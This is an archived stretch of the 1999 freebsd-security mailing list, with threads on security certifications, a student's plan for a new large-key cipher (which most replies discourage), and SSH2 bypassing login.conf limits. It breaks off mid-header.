1999 22:10:01 -0700 (PDT) (envelope-from bmyers1@tampabay.rr.com) Received: from k6400 ([24.92.13.191]) by tas5-atm.tampabay.rr.com (8.8.8+Sun/8.8.8+RoadRunner) with SMTP id BAA15983; Thu, 3 Jun 1999 01:07:36 -0400 (EDT) Message-ID: <004d01bead62$71406b40$bf0d5c18@tampabay.rr.com> From: "Bob Myers" To: "Wes Peters" Cc: References: <199906020817.MAA31586@paranoid.eltex.spb.ru> <37556EAB.6101B755@softweyr.com> Subject: Re: Security Ceritfication for individuals Date: Wed, 2 Jun 1999 21:42:42 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just FYI, the Tekmetrics tests for C and/or C++ are generally regarded as useless, or, even worse, just plain wrong. There was a full discussion of this issue in some of the C/C++ newsgroups a while back that you may want to review. ----- Original Message ----- From: Wes Peters To: Cc: ; Sent: Wednesday, June 02, 1999 1:49 PM Subject: Re: Security Ceritfication for individuals > ark@eltex.ru wrote: > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > nuqneH, > > > > Tekmetrics has announced it. I'd better not trust ICSA. > > IMHO security certification is all bullshit (in RL) but it is going to be > > free with Tekmetrics at least. > > I'd better say to fsck off to potential employer if he asks me if i have > > ICSA certification ;) > > I just poked around the Tekmetrics web site, and it looks pretty good. > If anyone is interested in creating FreeBSD certifications, as a > programmer, system administrator, or security administrator, working > with Tekmetrics to make FreeBSD-specific versions of their generic > UNIX exams would be a good starting point. > > http://www.tekmetrics.com/ (duh!) > > Try out the Dilbert "fun exam" for a sample of what their test > procedures look like. > > -- > "Where am I, and what am I doing in this handbasket?" > > Wes Peters Softweyr LLC > http://www.softweyr.com/~softweyr wes@softweyr.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 1:46:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id BBE68150D3 for ; Thu, 3 Jun 1999 01:46:13 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from wit395301.student.utwente.nl ([130.89.235.121]:25094 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8052-12447>; Thu, 3 Jun 1999 10:45:57 +0200 Message-ID: <375640B1.B901E581@vangelderen.org> Date: Thu, 03 Jun 1999 10:45:37 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Laurence Berland Cc: security@FreeBSD.ORG Subject: Re: Not freebsd related...yet References: <3755D0E4.55677E6@confusion.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Laurence Berland wrote: > I'm writing a new encryption algorithm for my computer science > final project. Although it doesnt need to be particularly great > I'm thinking there's no reason it's gotta be bad. No offense, but the fact that you think this sort of implies that it *will* be bad. Is there any reason for you to invent another (probably insecure) algorithm instead of picking one from the collection of existing, secure ciphers? > I'm building a symmetric algorithm that is designed to > specifically handle large keys ie >1024 bytes. Any reason as to why you accept such long keys? The DES successor (AES) will take 256 bits maximum and the cryptographic community considers this sufficient. > If anyone has any hints or suggestions, I'm open to them...in > fact that's why I'm writing this in the first place. If it > works well, maybe someday people will actually use it, then > again maybe not. thanks for your time. For starters, read Bruce Schneier's "Applied Cryptography", 2nd Edition. Read it completely. Read "Cryptography, Theory and Practice" by Douglas Stinson and the "Handbook of Applied Cryptography" by Menezes et al. Have a look at the appropriate newsgroups and pay attention to what happens to new algorithms. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 2:17:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id 5D7FE151B1 for ; Thu, 3 Jun 1999 02:17:22 -0700 (PDT) (envelope-from ark@eltex.ru) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id NAA22141; Thu, 3 Jun 1999 13:17:05 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Thu, 3 Jun 1999 13:16:11 +0400 Received: from undisclosed-intranet-sender id xma016192; Thu, 3 Jun 99 13:16:00 +0400 Date: Thu, 3 Jun 1999 13:15:47 +0400 Message-Id: <199906030915.NAA04908@paranoid.eltex.spb.ru> In-Reply-To: <004d01bead62$71406b40$bf0d5c18@tampabay.rr.com> from ""Bob Myers" " From: ark@eltex.ru Organization: "Klingon Imperial Intelligence Service" Subject: Re: Security Ceritfication for individuals To: bmyers1@tampabay.rr.com Cc: , wes@softweyr.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, "Bob Myers" said : > Just FYI, the Tekmetrics tests for C and/or C++ are generally > regarded as useless, or, even worse, just plain wrong. There > was a full discussion of this issue in some of the C/C++ > newsgroups a while back that you may want to review. Do you know a test/exam that is not? Microsoft? Checkpoint? Even Novell? No. Maybe CISCO but i have not seen it. _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBN1ZHwqH/mIJW9LeBAQG+GgP/QPxfo4ZrwCON6xqAnsLDrr/jfjVr3vX6 nEDmDbbGu1u+pFJcZLgAzyA1OV3obaLZex7OUfftviRefSZV1gKK6e7Mo44zVruS 7IetPpcFm8wTtrXwlMzT1O5mn2kIkZfe1Enc6TuL4xmdDVEdi62Zg3sWmXJjQBoI TiQeOKCmY0s= =/442 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 5:37: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 4843B14FD1 for ; Thu, 3 Jun 1999 05:36:55 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id IAA24977; Thu, 3 Jun 1999 08:56:44 -0400 (EDT) Date: Thu, 3 Jun 1999 08:56:44 -0400 From: Adam Shostack To: Laurence Berland Cc: security@FreeBSD.ORG Subject: Re: Not freebsd related...yet Message-ID: <19990603085644.A24954@weathership.homeport.org> References: <3755D0E4.55677E6@confusion.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <3755D0E4.55677E6@confusion.net>; from Laurence Berland on Wed, Jun 02, 1999 at 08:48:36PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jun 02, 1999 at 08:48:36PM -0400, Laurence Berland wrote: | I'm writing a new encryption algorithm for my computer science final | project. Although it doesnt need to be particularly great I'm thinking | there's no reason it's gotta be bad. I'm building a symmetric algorithm | that is designed to specifically handle large keys ie >1024 bytes. If | anyone has any hints or suggestions, I'm open to them...in fact that's | why I'm writing this in the first place. If it works well, maybe | someday people will actually use it, then again maybe not. thanks for | your time. Actually, this will be 1. broken, and 2. uninteresting. I'd be happy to bet money if it wasn't a sucker bet. 1. Building a cipher with a large key is hard. See the first twofish paper, where Schneier et al, discuss the difficulty of building a key schedule to effectively use long keys. Getting 1024 BYTES of randomness is next to impossible, so your implementors will end up expanding a smaller pool of randomness into a large key. Given that this is unavoidable, you should anticipate it in your design, and have a key expansion phase. That you didn't know this is worrisome. 2. Building a system to use more resources than current systems, and expecting resource consumption to make it interesting is silly. If you want an interesting project, may I suggest trying to cryptanalyze one of the AES candidates? Its more interesting, will teach you a bunch, and may produce something useful. Sorry to flame, but this really isn't a good use of your time. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 7:14:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 8FE3415256 for ; Thu, 3 Jun 1999 07:14:51 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id RAA20251; Thu, 3 Jun 1999 17:14:36 +0300 (EEST) Date: Thu, 3 Jun 1999 17:14:35 +0300 (EEST) From: Narvi To: Adam Shostack Cc: Laurence Berland , security@FreeBSD.ORG Subject: Re: Not freebsd related...yet In-Reply-To: <19990603085644.A24954@weathership.homeport.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 3 Jun 1999, Adam Shostack wrote: > > Actually, this will be 1. broken, and 2. uninteresting. I'd be happy > to bet money if it wasn't a sucker bet. > > 1. Building a cipher with a large key is hard. See the first twofish > paper, where Schneier et al, discuss the difficulty of building a key > schedule to effectively use long keys. Getting 1024 BYTES of > randomness is next to impossible, so your implementors will end up > expanding a smaller pool of randomness into a large key. Given that > this is unavoidable, you should anticipate it in your design, and have > a key expansion phase. That you didn't know this is worrisome. > Let's leave aside what he knows and what he doesn't. Using 1024 bytes of key is trivially easy if you are doing (large block) block chipher. Say you have 1024 byte key and operate on 4096 byte blocks. Subdivide the key into 64 16 byte subkeys and the key into 64 byte subblocks. Now encode sublock n with subkey n using a conventional chipher. The resulting enconging is stronger than the one used on the subblocks. Then again, definately not enough to pay for the extreme size... But I think he mixed up bytes and bits, and 1024bit keys aren't all that bad. > 2. Building a system to use more resources than current systems, and > expecting resource consumption to make it interesting is silly. > I really don't think that he meant that. > If you want an interesting project, may I suggest trying to > cryptanalyze one of the AES candidates? Its more interesting, will > teach you a bunch, and may produce something useful. > > Sorry to flame, but this really isn't a good use of your time. > I gues he *HAS* to come up with something himself and then code it for his CS final project. And crypto may very well also be set as the subset from which he has to come up with something. > Adam > > > -- > "It is seldom that liberty of any kind is lost all at once." > -Hume Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 7:18:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id 1448315345 for ; Thu, 3 Jun 1999 07:18:26 -0700 (PDT) (envelope-from petrilli@amber.org) Received: by trump.amber.org (Postfix, from userid 1000) id B63841860D; Thu, 3 Jun 1999 10:18:22 -0400 (EDT) Message-ID: <19990603101822.B21535@amber.org> Date: Thu, 3 Jun 1999 10:18:22 -0400 From: Christopher Petrilli To: "Jeroen C. van Gelderen" , Laurence Berland Cc: security@FreeBSD.ORG Subject: Re: Not freebsd related...yet References: <3755D0E4.55677E6@confusion.net> <375640B1.B901E581@vangelderen.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <375640B1.B901E581@vangelderen.org>; from Jeroen C. van Gelderen on Thu, Jun 03, 1999 at 10:45:37AM +0200 X-Disclaimer: I hardly speak for myself, muchless anyone else. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As has always been expressed to me: "Never trust anyone to design a cipher who hasn't spent their life breaking them." What that means is that until you understand what can go WRONG in design (FEAL is a good example of great theory, lousy crypto), there's no way you can even begin to sketch out ideas for a viable crypto algorithm. And if you're not going to write a viable one, why bother? Something more interesting in the crypto world would be dealing with one of the protocols for applying crypto, such as coin flipping, the proverbial poker game, or anonymous cash... Zero Knowledge Proofs might also be interesting... for example, a login system based on ZKP. Chris -- | Christopher Petrilli ``Television is bubble-gum for | petrilli@amber.org the mind.''-Frank Lloyd Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 7:26:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id F1A6E15345 for ; Thu, 3 Jun 1999 07:26:18 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id KAA25703; Thu, 3 Jun 1999 10:45:39 -0400 (EDT) Date: Thu, 3 Jun 1999 10:45:39 -0400 From: Adam Shostack To: Narvi Cc: Laurence Berland , security@FreeBSD.ORG Subject: Re: Not freebsd related...yet Message-ID: <19990603104539.A25645@weathership.homeport.org> References: <19990603085644.A24954@weathership.homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Narvi on Thu, Jun 03, 1999 at 05:14:35PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 05:14:35PM +0300, Narvi wrote: | On Thu, 3 Jun 1999, Adam Shostack wrote: | > Actually, this will be 1. broken, and 2. uninteresting. I'd be happy | > to bet money if it wasn't a sucker bet. | > | > 1. Building a cipher with a large key is hard. See the first twofish | > paper, where Schneier et al, discuss the difficulty of building a key | > schedule to effectively use long keys. Getting 1024 BYTES of | > randomness is next to impossible, so your implementors will end up | > expanding a smaller pool of randomness into a large key. Given that | > this is unavoidable, you should anticipate it in your design, and have | > a key expansion phase. That you didn't know this is worrisome. | > | | Let's leave aside what he knows and what he doesn't. | | Using 1024 bytes of key is trivially easy if you are doing (large block) | block chipher. Say you have 1024 byte key and operate on 4096 byte blocks. | Subdivide the key into 64 16 byte subkeys and the key into 64 byte | subblocks. Now encode sublock n with subkey n using a conventional | chipher. The resulting enconging is stronger than the one used on the | subblocks. Then again, definately not enough to pay for the extreme | size... And the avalanche property? Your proposal is going to require a lot of rounds before each key bit has a chance to effect each bit of plaintext. | But I think he mixed up bytes and bits, and 1024bit keys aren't all that | bad. Yes, they are. Address my points about randomness and expansion, or don't. Few of the AES candidates have keys that can go longer than 256 bits. This is because the smart cryptographers who did the design were not comfortable with keys that long. | > 2. Building a system to use more resources than current systems, and | > expecting resource consumption to make it interesting is silly. | | I really don't think that he meant that. The only point he made was that he wanted to use really big keys. I suggest that this is not only a not useful goal, but it is likely to detract from the security of the system. | > If you want an interesting project, may I suggest trying to | > cryptanalyze one of the AES candidates? Its more interesting, will | > teach you a bunch, and may produce something useful. | > | > Sorry to flame, but this really isn't a good use of your time. | I gues he *HAS* to come up with something himself and then code it for his | CS final project. And crypto may very well also be set as the subset from | which he has to come up with something. If he needs to write code, there are a large number of useful projects that could be worked on; integrating crypto into a file system; integrating ssh-agent into an existing crypto file system; adding crypto to a protocol like icq or irc. I'd be fairly shocked to discover a professor who is assigning the creation of new systems as a senior project. Adam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 7:30:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id CD782152A3 for ; Thu, 3 Jun 1999 07:30:45 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id AAA09543; Fri, 4 Jun 1999 00:30:35 +1000 Date: Fri, 4 Jun 1999 00:30:34 +1000 (EST) From: Nicholas Brawn To: Laurence Berland Cc: security@FreeBSD.ORG Subject: Re: Not freebsd related...yet In-Reply-To: <3755D0E4.55677E6@confusion.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 2 Jun 1999, Laurence Berland wrote: > I'm writing a new encryption algorithm for my computer science final > project. Although it doesnt need to be particularly great I'm thinking > there's no reason it's gotta be bad. I'm building a symmetric algorithm > that is designed to specifically handle large keys ie >1024 bytes. If > anyone has any hints or suggestions, I'm open to them...in fact that's > why I'm writing this in the first place. If it works well, maybe > someday people will actually use it, then again maybe not. thanks for > your time. I'm not sure how much reading you've done in the area, but unless there have been some massive developments in the field, a 1024 *symmetric* key is ridiculous. At the very most, a 128 bit key should suffice, but it doesn't hurt to make the key length variable. I recommend you obtain Bruce Schnier's excellent book, Applied Cryptography, and read about some of the design criteria for the top symmetric algorithms in use today. It will give you a good idea of how you should be approaching development of a new cipher. -Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 9:19:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 650CB15415 for ; Thu, 3 Jun 1999 09:19:26 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id TAA22165; Thu, 3 Jun 1999 19:19:14 +0300 (EEST) Date: Thu, 3 Jun 1999 19:19:14 +0300 (EEST) From: Narvi To: Christopher Petrilli Cc: "Jeroen C. van Gelderen" , Laurence Berland , security@FreeBSD.ORG Subject: Re: Not freebsd related...yet In-Reply-To: <19990603101822.B21535@amber.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 3 Jun 1999, Christopher Petrilli wrote: [snip] > > Something more interesting in the crypto world would be dealing with one > of the protocols for applying crypto, such as coin flipping, the > proverbial poker game, or anonymous cash... Zero Knowledge Proofs might > also be interesting... for example, a login system based on ZKP. > ZKP combined with VPN-s is probably the future in networking... > Chris > -- > | Christopher Petrilli ``Television is bubble-gum for > | petrilli@amber.org the mind.''-Frank Lloyd Wright > Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 9:45:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (wandering-wizard.cybercity.dk [212.242.41.238]) by hub.freebsd.org (Postfix) with ESMTP id 31BF414E09 for ; Thu, 3 Jun 1999 09:45:39 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id SAA03614; Thu, 3 Jun 1999 18:44:55 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Christopher Petrilli Cc: "Jeroen C. van Gelderen" , Laurence Berland , security@FreeBSD.ORG Subject: Re: Not freebsd related...yet In-reply-to: Your message of "Thu, 03 Jun 1999 10:18:22 EDT." <19990603101822.B21535@amber.org> Date: Thu, 03 Jun 1999 18:44:55 +0200 Message-ID: <3612.928428295@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can we please move this thread to somewhere else than a freebsd mailing list, THANKYOU! Poul-Henning In message <19990603101822.B21535@amber.org>, Christopher Petrilli writes: >As has always been expressed to me: > >"Never trust anyone to design a cipher who hasn't spent their life >breaking them." > >What that means is that until you understand what can go WRONG in design >(FEAL is a good example of great theory, lousy crypto), there's no way >you can even begin to sketch out ideas for a viable crypto algorithm. >And if you're not going to write a viable one, why bother? > >Something more interesting in the crypto world would be dealing with one >of the protocols for applying crypto, such as coin flipping, the >proverbial poker game, or anonymous cash... Zero Knowledge Proofs might >also be interesting... for example, a login system based on ZKP. > >Chris >-- >| Christopher Petrilli ``Television is bubble-gum for >| petrilli@amber.org the mind.''-Frank Lloyd Wright > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10: 5: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 2D97415210 for ; Thu, 3 Jun 1999 10:04:47 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.203] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A87430E0096; Thu, 03 Jun 1999 14:16:36 -0300 Message-ID: <37568B58.C48DCEA2@tdnet.com.br> Date: Thu, 03 Jun 1999 14:04:08 +0000 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: SSH2 (in FreeBSD-Questions) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following was running at Questions: login.conf is all fine and dandy, but... SSH2 doesn't support using login, SSH1 did, I don't know why they removed it, I rather liked it. So people logging in with SSH2 wouldn't be affected by anything in login.conf...Unless there's some hidden feature in SSH2 that lets it use login, I'm screwed, or I only run SSH1, unfortunately, most windows ssh clients default to SSH2 protocol from what I've seen. I don't expect them to enjoy that.. =P -**- What is this? Isn't the OS supposed to be robust enough to handle that! How is possible to write a software that can bypass system limits imposed by sysadmin? how is it implemented? So this implementation is insecure, once it ALLOW user level programs run over it! Can anybody explain me it? Thanks a lot! -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:24:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id 6B8E615058 for ; Thu, 3 Jun 1999 10:24:48 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id KAA59233; Thu, 3 Jun 1999 10:24:27 -0700 (PDT) (envelope-from mph) Date: Thu, 3 Jun 1999 10:24:27 -0700 From: Matthew Hunt To: Unknow User Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) Message-ID: <19990603102427.D58665@wopr.caltech.edu> References: <37568B58.C48DCEA2@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <37568B58.C48DCEA2@tdnet.com.br>; from Unknow User on Thu, Jun 03, 1999 at 02:04:08PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 03, 1999 at 02:04:08PM +0000, Unknow User wrote: > login.conf is all fine and dandy, but... SSH2 doesn't support using > login, SSH1 did, I don't know why they removed it, I rather liked it. Did you install ssh2 from the Ports Collection? I haven't tried it, but it looks like patch-ah provides login.conf functionality. -- Matthew Hunt * UNIX is a lever for the http://www.pobox.com/~mph/ * intellect. -J.R. Mashey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:29: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 9ED7C1550C for ; Thu, 3 Jun 1999 10:28:50 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.203] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id ADFF396008C; Thu, 03 Jun 1999 14:40:15 -0300 Message-ID: <375690E3.4BC9BB94@tdnet.com.br> Date: Thu, 03 Jun 1999 14:27:47 +0000 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: Matthew Hunt Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No, i never use ports (Due to security problem)! i always get the source! Any tips? Thanks. -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:34:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 625B51550C for ; Thu, 3 Jun 1999 10:34:36 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id LAA27177; Thu, 3 Jun 1999 11:34:34 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.3/8.9.1) id LAA61854; Thu, 3 Jun 1999 11:34:33 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Thu, 3 Jun 1999 11:34:33 -0600 (MDT) From: "David G. Andersen" To: Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: Unknow User's message of Thu, June 3 1999 <375690E3.4BC9BB94@tdnet.com.br> References: <37568B58.C48DCEA2@tdnet.com.br> <19990603102427.D58665@wopr.caltech.edu> <375690E3.4BC9BB94@tdnet.com.br> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14166.48244.203647.561921@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and Behold, Unknow User said: > No, i never use ports (Due to security problem)! > i always get the source! > > Any tips? Use ports. That's what they're there for, that's why they have MD5 signatures. Alternate: Look over the patch, apply it yourself. This is called "Acting on behalf of the ports system", and is also known as a waste of time, but it should work. -Dave To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:35:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 293AA15966 for ; Thu, 3 Jun 1999 10:35:48 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id NAA26944; Thu, 3 Jun 1999 13:38:26 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Thu, 3 Jun 1999 13:38:26 -0400 (EDT) From: Bill Fumerola To: Unknow User Cc: Matthew Hunt , freebsd-security@FreeBSD.ORG Subject: Re: SSH2 (in FreeBSD-Questions) In-Reply-To: <375690E3.4BC9BB94@tdnet.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 3 Jun 1999, Unknow User wrote: > No, i never use ports (Due to security problem)! > i always get the source! > > Any tips? Manually apply the patch or use the source and figure it out for yourself. Stop doing things the hard way just for a false sense of security. - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 3 10:37: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id D05681552F for ; Thu, 3 Jun 1999 10:36:56 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP 